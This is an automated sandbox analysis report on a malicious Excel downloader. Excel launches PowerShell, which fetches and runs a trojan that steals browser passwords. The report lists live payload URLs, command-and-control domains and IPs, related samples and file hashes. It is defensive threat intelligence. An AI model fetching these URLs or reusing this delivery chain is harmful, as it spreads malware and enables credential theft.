37->88 42 cmd.exe 37->42         started        45 cmd.exe 37->45         started        47 mode.com 37->47         started        process14 signatures15 98 Suspicious powershell command line found 42->98 100 Tries to download and execute files (via powershell) 42->100 49 powershell.exe 8 42->49         started        process16 dnsIp17 64 cutt.ly 49->64 66 chebo.discountmonumentcenter.com 192.185.194.191, 49169, 80 UNIFIEDLAYER-AS-1US United States 49->66 58 C:\Users\user\AppData\Roaming\cr.exe, PE32 49->58 dropped 53 cr.exe 5 49->53         started        file18 process19 dnsIp20 70 trashbininspector.fun 104.18.58.219, 443, 49176, 49177 CLOUDFLARENETUS United States 53->70 72 telete.in 195.201.225.248, 443, 49174 HETZNER-ASDE Germany 53->72 60 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 53->60 dropped 90 Multi AV Scanner detection for dropped file 53->90 92 Machine Learning detection for dropped file 53->92 94 Contains functionality to steal Internet Explorer form passwords 53->94 96 Tries to harvest and steal browser information (history, passwords, etc) 53->96 file21 signatures22

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      ul9kpUwYel.xls42%VirustotalBrowse
      ul9kpUwYel.xls25%MetadefenderBrowse
      ul9kpUwYel.xls34%ReversingLabsDocument-Word.Downloader.EncDoc

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\cr.exe100%Joe Sandbox ML
      C:\Users\user\AppData\LocalLow\sqlite3.dll0%MetadefenderBrowse
      C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
      C:\Users\user\AppData\Roaming\cr.exe72%ReversingLabsWin32.Trojan.Glupteba

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      24.2.cr.exe.400000.0.unpack100%AviraHEUR/AGEN.1137972Download File

      Domains

      SourceDetectionScannerLabelLink
      cutt.ly0%VirustotalBrowse
      trashbininspector.fun8%VirustotalBrowse
      chebo.discountmonumentcenter.com4%VirustotalBrowse
      telete.in2%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      http://37.46.150.139/bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://chebo.discountmonumentcenter.com/vantuz_2021.exe100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      cutt.ly
      104.22.1.232
      truetrueunknown
      trashbininspector.fun
      104.18.58.219
      truetrueunknown
      chebo.discountmonumentcenter.com
      192.185.194.191
      truefalseunknown
      telete.in
      195.201.225.248
      truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://37.46.150.139/bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.batfalse
      • Avira URL Cloud: safe
      unknown
      http://chebo.discountmonumentcenter.com/vantuz_2021.exetrue
      • Avira URL Cloud: malware
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.piriform.com/ccleanerpowershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmpfalse
        high
        http://www.%s.comPApowershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        low
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmpfalse
          high
          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmpfalse
            high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            104.18.58.219
            unknownUnited States
            13335CLOUDFLARENETUStrue
            195.201.225.248
            unknownGermany
            24940HETZNER-ASDEfalse
            192.185.194.191
            unknownUnited States
            46606UNIFIEDLAYER-AS-1USfalse
            37.46.150.139
            unknownMoldova Republic of
            8758IWAYCHfalse
            104.22.1.232
            unknownUnited States
            13335CLOUDFLARENETUStrue

            General Information

            Joe Sandbox Version:31.0.0 Red Diamond
            Analysis ID:337274
            Start date:08.01.2021
            Start time:09:04:48
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 29s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:ul9kpUwYel.xls
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:26
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.spyw.expl.evad.winXLS@36/22@17/5
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 51%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xls
            • Changed system and user locale, location and keyboard layout to French - France
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
            • TCP Packets have been reduced to 100
            • Excluded IPs from analysis (whitelisted): 93.184.221.240, 205.185.216.10, 205.185.216.42, 192.35.177.64
            • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, apps.digsigtrust.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net, apps.identrust.com
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryDirectoryFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            09:05:58API Interceptor554x Sleep call for process: powershell.exe modified
            09:06:21API Interceptor879x Sleep call for process: cr.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            104.18.58.219fiUdG0AFun.exeGet hashmaliciousBrowse
              7aXAKHF9Fy.exeGet hashmaliciousBrowse
                195.201.225.248http://telete.inGet hashmaliciousBrowse
                • telete.in/
                37.46.150.139spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat
                Payment Documents.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.bat
                Payment Documents.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.bat
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat
                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_047e37f7-e236-4c64-9509-11f16943b4e0_mic2_wddisabler.bat
                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_3357e6d8-1780-4654-872a-eca3aa375ffd_kingshakes_wdexclusion.bat
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_43922847-73c3-4df3-b101-5f9d12f30aed_mic2_wddisabler.bat
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_43922847-73c3-4df3-b101-5f9d12f30aed_mic2_wddisabler.bat
                AdviceSlip.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_929f596a-b84d-4151-a6b5-c95e07d329c0_frankie777_wddisabler.bat
                Export Order Vene.xlsGet hashmaliciousBrowse
                • 37.46.150.139/bat/scriptxls_d8648b70-66b3-4072-9876-0224b204a193_spicytorben_wdexclusion.bat

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                cutt.lyspetsifikatsiya.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                Payment Documents.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                Payment Documents.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                6Cprm97UTl.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                AdviceSlip.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                file.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                file.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                file.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                output.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                • 104.22.1.232
                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                • 104.22.0.232
                30689741.xlsGet hashmaliciousBrowse
                • 172.67.8.238
                trashbininspector.funCOO_TPE0269320_image2020-12-31-055841.exeGet hashmaliciousBrowse
                • 172.67.166.210
                sek750_2021.exeGet hashmaliciousBrowse
                • 172.67.166.210
                0I2ddZZKv7.exeGet hashmaliciousBrowse
                • 104.18.59.219
                Q2BZ01fmwK.exeGet hashmaliciousBrowse
                • 104.18.59.219
                fiUdG0AFun.exeGet hashmaliciousBrowse
                • 104.18.58.219
                7aXAKHF9Fy.exeGet hashmaliciousBrowse
                • 104.18.58.219
                sU0m70ahcm.exeGet hashmaliciousBrowse
                • 172.67.166.210
                vDKnVBINrY.exeGet hashmaliciousBrowse
                • 172.67.166.210
                telete.inCOO_TPE0269320_image2020-12-31-055841.exeGet hashmaliciousBrowse
                • 195.201.225.248
                sek750_2021.exeGet hashmaliciousBrowse
                • 195.201.225.248
                0I2ddZZKv7.exeGet hashmaliciousBrowse
                • 195.201.225.248
                Q2BZ01fmwK.exeGet hashmaliciousBrowse
                • 195.201.225.248
                fiUdG0AFun.exeGet hashmaliciousBrowse
                • 195.201.225.248
                7aXAKHF9Fy.exeGet hashmaliciousBrowse
                • 195.201.225.248
                sU0m70ahcm.exeGet hashmaliciousBrowse
                • 195.201.225.248
                vDKnVBINrY.exeGet hashmaliciousBrowse
                • 195.201.225.248
                AhKkG7vMNO.exeGet hashmaliciousBrowse
                • 195.201.225.248
                H8V8ifqdod.exeGet hashmaliciousBrowse
                • 195.201.225.248
                HOJAsmBUjl.exeGet hashmaliciousBrowse
                • 195.201.225.248
                BYatCHksal.exeGet hashmaliciousBrowse
                • 195.201.225.248
                FwkgiBlwcg.exeGet hashmaliciousBrowse
                • 195.201.225.248
                Z4dFPbScY2.exeGet hashmaliciousBrowse
                • 195.201.225.248
                0XxTmF8pEW.exeGet hashmaliciousBrowse
                • 195.201.225.248
                uMtPsgsHU2.exeGet hashmaliciousBrowse
                • 195.201.225.248
                ZJaczSqbMl.exeGet hashmaliciousBrowse
                • 195.201.225.248
                53CmqAXIHb.exeGet hashmaliciousBrowse
                • 195.201.225.248
                VWOhpUmgcP.exeGet hashmaliciousBrowse
                • 195.201.225.248
                S5N3DvtQ0h.exeGet hashmaliciousBrowse
                • 195.201.225.248

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                IWAYCHspetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                Payment Documents.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                Payment Documents.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                AdviceSlip.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                Export Order Vene.xlsGet hashmaliciousBrowse
                • 37.46.150.139
                SimpNet.shGet hashmaliciousBrowse
                • 37.46.150.238
                Rr0veY2Ho5.exeGet hashmaliciousBrowse
                • 37.46.150.211
                product_qoute_6847684898.xlsGet hashmaliciousBrowse
                • 37.46.150.211
                EjtRDKZNkXWoLTE.exeGet hashmaliciousBrowse
                • 37.46.150.60
                ru7co.xlsGet hashmaliciousBrowse
                • 37.46.150.60
                http://37.46.150.184/high/imanGet hashmaliciousBrowse
                • 37.46.150.184
                SWIFT-MTC749892-10-12-20_pdf.exeGet hashmaliciousBrowse
                • 37.46.150.41
                SWIFT COPY.xlsGet hashmaliciousBrowse
                • 37.46.150.41
                PAYMENT DOC.xlsGet hashmaliciousBrowse
                • 37.46.150.41
                CLOUDFLARENETUSF6D24k8j9o.exeGet hashmaliciousBrowse
                • 104.28.5.151
                36.exeGet hashmaliciousBrowse
                • 104.28.8.109
                IKWSLxGlrQ.exeGet hashmaliciousBrowse
                • 172.67.188.154
                https://bit.ly/35cYpiTGet hashmaliciousBrowse
                • 104.16.18.94
                https://new-fax-messages.mydopweb.com/Get hashmaliciousBrowse
                • 104.16.18.94
                https://www.food4rhino.com/app/humanGet hashmaliciousBrowse
                • 104.16.18.94
                OKU-010920 SCQ-220920.docGet hashmaliciousBrowse
                • 104.24.113.40
                https://www.food4rhino.com/app/elefrontGet hashmaliciousBrowse
                • 104.16.18.94
                INFO.docGet hashmaliciousBrowse
                • 104.18.61.59
                Softerra Adaxes 2011.3.exeGet hashmaliciousBrowse
                • 172.67.215.32
                https://atacadaodocompensado.com.br/office356.com-RD163Get hashmaliciousBrowse
                • 104.16.124.96
                http://message.mydopweb.comGet hashmaliciousBrowse
                • 104.16.18.94
                https://hcsonsite-my.sharepoint.com/:b:/p/kmunneke/Ed-MOs2kV-NKo-A6zYXkP-8BJ5RTme_cDf9g6Ut5u5rIiA?e=MaLsZF hcsonsite-my.sharepoint.comGet hashmaliciousBrowse
                • 104.16.95.65
                http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
                • 104.16.18.94
                http://subreqxserver1132.azurewebsites.netGet hashmaliciousBrowse
                • 104.16.18.94
                document.chm .exeGet hashmaliciousBrowse
                • 104.27.202.87
                catalogo TAWI group.exeGet hashmaliciousBrowse
                • 104.27.188.95
                MAIL-0573188.docGet hashmaliciousBrowse
                • 172.67.158.72
                DSj7ak0N6I.exeGet hashmaliciousBrowse
                • 104.28.5.151
                https://wqi69130.mfs.gg/099mmYlGet hashmaliciousBrowse
                • 172.67.74.85
                HETZNER-ASDEBuran.exeGet hashmaliciousBrowse
                • 88.99.66.31
                SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                • 188.40.194.163
                https://web.tresorit.com/l/JG7xl#7YqXRnhV6spRT3ekJskNawGet hashmaliciousBrowse
                • 138.201.9.137
                order FTH2004-005 .exeGet hashmaliciousBrowse
                • 144.76.181.177
                SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                • 188.40.194.163
                http://search.hwatchtvnow.coGet hashmaliciousBrowse
                • 116.202.46.88
                LzSA04PNya.exeGet hashmaliciousBrowse
                • 88.99.66.31
                xPcTV1mh3w.exeGet hashmaliciousBrowse
                • 88.99.66.31
                http://ovd.ru/forum/register.php?a=act&u=84666&i=25545989Get hashmaliciousBrowse
                • 159.69.74.8
                https://kingfenceny.1kcloud.com/edlv_3zGFs/#0Get hashmaliciousBrowse
                • 188.40.18.222
                https://kingfenceny.1kcloud.com/edlv_3zGFs/#0Get hashmaliciousBrowse
                • 188.40.18.222
                https://kingfenceny.1kcloud.com/edlv_3zGFs/#0Get hashmaliciousBrowse
                • 188.40.18.222
                DFR2154747.vbeGet hashmaliciousBrowse
                • 136.243.172.101
                promet2Get hashmaliciousBrowse
                • 88.198.246.242
                WZJIuy3UYm.exeGet hashmaliciousBrowse
                • 95.217.228.176
                COO_TPE0269320_image2020-12-31-055841.exeGet hashmaliciousBrowse
                • 195.201.225.248
                https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                • 138.201.9.137
                http://search.hwatchtvnow.coGet hashmaliciousBrowse
                • 116.202.46.88
                https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                • 138.201.9.137
                f_026dfd.exeGet hashmaliciousBrowse
                • 49.12.121.47
                UNIFIEDLAYER-AS-1US______.docGet hashmaliciousBrowse
                • 192.185.151.24
                ______.docGet hashmaliciousBrowse
                • 192.185.151.24
                http://0620218.unfreezegrowers.com/bGVhaC5oZWl0bmVyQGV4cC5jb20=Get hashmaliciousBrowse
                • 162.241.175.181
                http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
                • 50.87.150.0
                https://1drv.ms/u/s!AmqlOnt-7_dxdENKsoSwOCjxG_Q?e=3ZrXeGGet hashmaliciousBrowse
                • 162.241.127.190
                https://cypressbayhockey.com/NOGet hashmaliciousBrowse
                • 192.185.120.89
                https://pdfsharedmessage.xtensio.com/7wtcdltaGet hashmaliciousBrowse
                • 108.179.246.23
                form.docGet hashmaliciousBrowse
                • 162.241.148.243
                RFQPO90865802ICONME.exeGet hashmaliciousBrowse
                • 192.185.131.105
                Ekz Payment.htmGet hashmaliciousBrowse
                • 192.185.196.146
                http://moneypay.best/Get hashmaliciousBrowse
                • 192.232.250.4
                https://canningelectricinc.wordpress.com/Get hashmaliciousBrowse
                • 192.185.188.96
                Lmcgrath - FAX_ALNRSUW.htmlGet hashmaliciousBrowse
                • 192.185.29.156
                Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                • 108.167.141.199
                W08347.exeGet hashmaliciousBrowse
                • 192.185.117.218
                https://datetheright1.com/damn/sharepoint%20newGet hashmaliciousBrowse
                • 162.144.40.98
                http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/Get hashmaliciousBrowse
                • 162.241.101.253
                8G9b9FXspm.exeGet hashmaliciousBrowse
                • 162.241.219.113
                Nuevo pedido.exeGet hashmaliciousBrowse
                • 192.185.131.105
                PO #000941.exeGet hashmaliciousBrowse
                • 162.241.216.233

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                05af1f5ca1b87cc9cc9b25185115607d______.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                ______.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                OKU-010920 SCQ-220920.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                JI35907_2020.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                info.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Info.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                documents.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Shipping Document PL and BL003534.pptGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Payment Documents.xlsGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                6Cprm97UTl.xlsGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                DAT 2020_12_30.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                PSX7103491.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Beauftragung.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                1I72L29IL3F.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Adjunto_2021.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\Users\user\AppData\LocalLow\sqlite3.dllCOO_TPE0269320_image2020-12-31-055841.exeGet hashmaliciousBrowse
                  sek750_2021.exeGet hashmaliciousBrowse
                    0I2ddZZKv7.exeGet hashmaliciousBrowse
                      Q2BZ01fmwK.exeGet hashmaliciousBrowse
                        fiUdG0AFun.exeGet hashmaliciousBrowse
                          sU0m70ahcm.exeGet hashmaliciousBrowse
                            vDKnVBINrY.exeGet hashmaliciousBrowse
                              HOJAsmBUjl.exeGet hashmaliciousBrowse
                                FwkgiBlwcg.exeGet hashmaliciousBrowse
                                  0XxTmF8pEW.exeGet hashmaliciousBrowse
                                    uMtPsgsHU2.exeGet hashmaliciousBrowse
                                      ZJaczSqbMl.exeGet hashmaliciousBrowse
                                        53CmqAXIHb.exeGet hashmaliciousBrowse
                                          VWOhpUmgcP.exeGet hashmaliciousBrowse
                                            S5N3DvtQ0h.exeGet hashmaliciousBrowse
                                              q7ryNCLGYT.exeGet hashmaliciousBrowse
                                                rZ28UGXv3X.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exeGet hashmaliciousBrowse
                                                      530ppafC4x.exeGet hashmaliciousBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):77824
                                                        Entropy (8bit):1.1340767975888557
                                                        Encrypted:false
                                                        SSDEEP:96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
                                                        MD5:9A38AC1D3304A8EEFD9C54D4EADCCCD6
                                                        SHA1:56E953B2827B37491BC80E3BFDBBF535F95EDFA7
                                                        SHA-256:67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
                                                        SHA-512:32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
                                                        Malicious:false
                                                        Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                        Category:dropped
                                                        Size (bytes):58936
                                                        Entropy (8bit):7.994797855729196
                                                        Encrypted:true
                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                        Malicious:false
                                                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):893
                                                        Entropy (8bit):7.366016576663508
                                                        Encrypted:false
                                                        SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                        MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                        SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                        SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                        SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                        Malicious:false
